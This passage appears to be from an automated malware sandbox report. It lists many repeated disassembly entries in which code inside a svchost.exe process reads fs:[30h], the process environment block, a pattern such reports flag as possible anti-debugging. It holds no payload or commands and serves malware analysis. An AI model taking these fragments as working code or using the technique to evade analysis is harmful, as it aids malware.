Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]	2_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]	2_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]	2_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]	2_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]	2_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]	2_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]	2_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]	2_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]	2_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]	2_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]	2_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]	2_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]	2_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]	2_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]	2_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]	2_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]	2_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]	2_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]	2_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]	2_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]	2_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]	2_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]	2_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]	2_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]	2_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]	2_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]	2_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]	2_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]	2_2_0306A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]	2_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]	2_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]	2_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]	2_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]	2_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]	2_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]	2_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]	2_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]	2_2_03104B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03102B57 mov eax, dword ptr fs:[00000030h]	2_2_03102B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6B40 mov eax, dword ptr fs:[00000030h]	2_2_030C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FAB40 mov eax, dword ptr fs:[00000030h]	2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D8B42 mov eax, dword ptr fs:[00000030h]	2_2_030D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028B50 mov eax, dword ptr fs:[00000030h]	2_2_03028B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEB50 mov eax, dword ptr fs:[00000030h]	2_2_030DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302CB7E mov eax, dword ptr fs:[00000030h]	2_2_0302CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040BBE mov eax, dword ptr fs:[00000030h]	2_2_03040BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_030E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03050BCB mov eax, dword ptr fs:[00000030h]	2_2_03050BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030BCD mov eax, dword ptr fs:[00000030h]	2_2_03030BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_030DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038BF0 mov eax, dword ptr fs:[00000030h]	2_2_03038BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EBFC mov eax, dword ptr fs:[00000030h]	2_2_0305EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]	2_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]	2_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]	2_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]	2_2_0306CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]	2_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
